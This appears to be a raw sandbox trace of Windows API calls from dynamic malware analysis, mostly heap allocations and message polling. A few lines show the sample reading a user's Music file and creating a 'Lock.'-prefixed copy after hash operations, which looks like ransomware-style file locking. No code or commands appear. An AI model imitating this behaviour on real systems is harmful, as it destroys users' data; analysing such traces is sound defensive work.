HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0253.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0253.990] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0253.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0253.991] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0253.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0253.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0253.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0253.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.994] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.994] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.995] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.995] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.995] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.995] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.996] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.996] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.996] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.996] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xbqp6dtr52cbe6l-un.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0253.997] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.998] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0253.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0253.998] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0253.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.998] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.998] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0253.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0253.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0253.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x249c7b0 [0254.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.004] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0254.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0254.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0254.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.xBQp6dTr52cBE6l-Un.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.xbqp6dtr52cbe6l-un.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0254.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0254.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.006] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.007] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0254.007] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.007] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0254.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 